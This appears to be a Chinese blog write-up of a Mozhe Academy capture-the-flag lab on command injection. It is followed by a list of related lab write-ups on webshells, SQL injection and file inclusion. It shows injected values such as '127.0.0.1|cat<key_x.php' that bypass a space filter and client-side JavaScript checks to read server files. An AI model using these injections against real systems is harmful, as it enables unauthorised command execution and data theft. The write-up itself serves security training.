墨者学院—命令注入执行分析—两种解法

最新推荐文章于 2024-04-23 14:10:39 发布
最新推荐文章于 2024-04-23 14:10:39 发布
阅读量495 收藏
点赞数 1
分类专栏: # 墨者学院 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/109133261
版权

一.解题思路

利用管道符构造命令

二.操作步骤

解法一

1.测试127.0.0.1能否返回正常数据
在这里插入图片描述

2.使用BP抓包,改包
查看文件信息 iipp = 127.0.0.1|ls
在这里插入图片描述

查看key文件信息 iipp = 127.0.0.1|cat key_x.php
但是发现不能正常传输数据,空格被过滤。命令改为iipp = 127.0.0.1|cat<key_x.php

在这里插入图片描述

解法二

1.在火狐中禁用JS
在URL中输入about:config 开启火狐高级设置
在这里插入图片描述

2.命令127.0.0.1|ls
在这里插入图片描述

3.命令127.0.0.1|cat<key_x.php
在这里插入图片描述
网络信息安全-ploto

ploto_cs
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
墨者学院解题思路-密码学加解密实训(JavaScript分析)+代码分析详解
伪娘+
04-05 513
墨者学院解题思路-密码学加解密实训(JavaScript分析)+代码分析详解 背景介绍 一个最普通的HTML页面,可能也会存在信息泄露。查看一下页面源代码吧 实训目标 1、了解查看页面源代码; 2、代码分析; 解题方向 查看HTML页面的源代码。 思路:主要是分析代码,以下是代码详细解释。 提示里说看源代码,所以右键查看源代码,发现主要是JavaScript里的判定。 <script l...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者学院-命令注入执行分析
JimWu的博客
09-05 391
命令注入执行分析 难易程度:★★★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 1.打开靶场,ping一下127.0.0.1,正常显示。 2.打开burpsuite,再ping一下127.0.0.1,截包。 3.在127.0.0.1后加上管道符|和ls。 管道符的作用是命令A|命令B,即命令1的正确输出作为命令B的操作对象。 4.forward一下,显示文件。 5....
渗透测试-一文了解命令执行漏洞和代码执行漏洞
lza20001103的博客
04-23 1274
渗透测试-一文了解命令执行漏洞和代码执行漏洞
墨者学院 - 命令注入执行分析
多崎巡礼的博客
08-14 1058
直接ping 127.0.0.1正常回显 看源代码 script只能传数字嘤嘤嘤 burp抓包   利用管道符 得到文件目录  |cat 文件名来查看文件的内容, 发现空格被过滤掉了,所以用&lt;代替  |cat&lt;key_xxx.php,得到key值.      ...
墨者命令注入执行分析题解
zr1213159840的博客
01-16 457
首先是给了一个采购平台的页面,但是其实是一个带ping功能的页面 输入127.0.0.1后点击ping进行抓包试试 能看的出来分别提交了ip和命令,那么很明显我们可以尝试修改命令然后执行试试,修改为ls试试 发现好像没啥用。 那我们再修改下ip试试 一片黑,没反应。 其实要是在网页上输入,会发现如果不是ip,页面会弹出对话框说不是ip。 我们不修改后面提交的命令,直接在ip后面添加命令试试 发现能执行,我们cat一下这个key的文件看看 还是一片黑,极有可能是过滤了空格字符,我们使用其他的字符代
spring IOC实现(墨者革离)
12-12
在Spring中,实现IOC的主要方式有两种:依赖注入(Dependency Injection,DI)和基于XML的配置。在这个项目中,可能结合了这两种方法。依赖注入可以通过构造函数注入、setter方法注入或接口注入来实现,使得对象间的...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫"革离"技术。同时第二代集...
墨者学院12 命令注入执行分析
weixin_42789937的博客
02-22 284
墨者学院12 命令注入执行分析,是一个基础的命令执行前端绕过题目,博文罗列了两种常见解法:Burpsuite,以及禁用JavaScript~
墨者学院-SQL注入漏洞测试(MySQL数据库)-解题思路
weixin_43071873的博客
07-23 205
寻找注入点。在原页面注入没有回显,所以重新寻找其他页面,如下图中通知页面 2.找回显。 3确认注入点,确定列数 4.确认回显位置 5.读库以及库版本 6.读表。 7.读列 8.读数据, status为1时登陆成功,所以要把status为1的md5值解密,即为登陆密码 9.md5解密 10.登陆拿key ...
命令注入执行分析
weixin_50698958的博客
10-06 271
靶场: https://www.mozhe.cn/bug/detail/RWpnQUllbmNaQUVndTFDWGxaL0JjUT09bW96aGUmozhe 背景介绍 某单位IT运维人员为了方便,在服务器上留了一个页面,用来ping内部服务器连通情况。安全工程师"墨者"在做月度检查时发现了这一文件,检查发现这一文件存在漏洞,要求运维人员立刻下线。 实训目标 1、掌握Linux系统的基本命令; 2、了解Linux中管道符的作用; 解题方向 通过页面读取服务器上文件内容。 解题思路: 直接
墨者学院—本地执行漏洞溯源—两种解法
ploto_cs的博客
10-17 267
一.解题思路 利用本地文件包含漏洞执行命令 二.操作步骤 解法一 1.上传木马文件 点击 非注册用户上传文件 2.检查木马 访问uoload/PHP.PHP发现浏览器报错,无法访问 考虑存在本地文件包含漏洞 访问/index.php?t=upload/PHP.PHP 浏览器没有报错,木马上传成功 3.使用蚁剑连接木马 4.检查目录 发现key.txt位于/var/www 解法二 同样是利用本地文件包含漏洞,通过 …/来跨越目录访问key.txt 使用命令http://219.153.49.228:40
DVWA 靶场之 Command Injection(命令执行)原理介绍、分隔符测试、后门写入与源码分析、修复建议
Welcome To Myon'Blog !
02-26 2904
代替 localhost :在操作系统的配置文件中,通常将 localhost(本地主机名)与 127.0.0.1 绑定在一起,这样在应用程序中使用 localhost 时,实际上是在使用本地回环地址,用于访问本机上运行的网络服务和应用程序。在操作系统中,“ &、|、&&、|| ” 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。:对服务器和应用程序进行安全配置,关闭不必要的服务和功能,限制可执行命令的范围。
墨者学院】WebShell文件上传漏洞分析溯源(第4题)
m0_66835614的博客
11-29 836
WebShell文件上传漏洞分析溯源(第4题)
【精选】墨者学院—数据分析取证 (全通关WP+超详细解析)
人若无名,便可专心练剑
01-02 1194
保护数据,捍卫安全,展现技能,赢得荣耀!全国职业技能大赛-信息安全与评估大赛,挑战你的技术,揭示黑客的秘密!加入我们,成为信息安全的守护者!
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,攻击者通过不断尝试不同的条件,观察页面返回的结果来推断出数据库的信息。攻击者可以使用布尔逻辑运算符(如AND、OR)和条件语句(如等于、小于、大于等)来构造恶意的SQL查询。 为了防止SQL注入布尔攻击,开发人员应该采取以下预防措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只接受合法的输入。 2. 参数化查询:使用参数化查询或预编译语句来构建SQL查询,这样可以将用户输入作为参数传递给查询,而不是直接拼接在SQL语句中。 3. 最小权限原则:为数据库用户分配最小权限,避免给予不必要的数据库操作权限。 4. 错误消息保护:在生产环境中,不要将详细的错误消息返回给用户,以免泄露敏感信息。 希望这能帮到你!如果有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值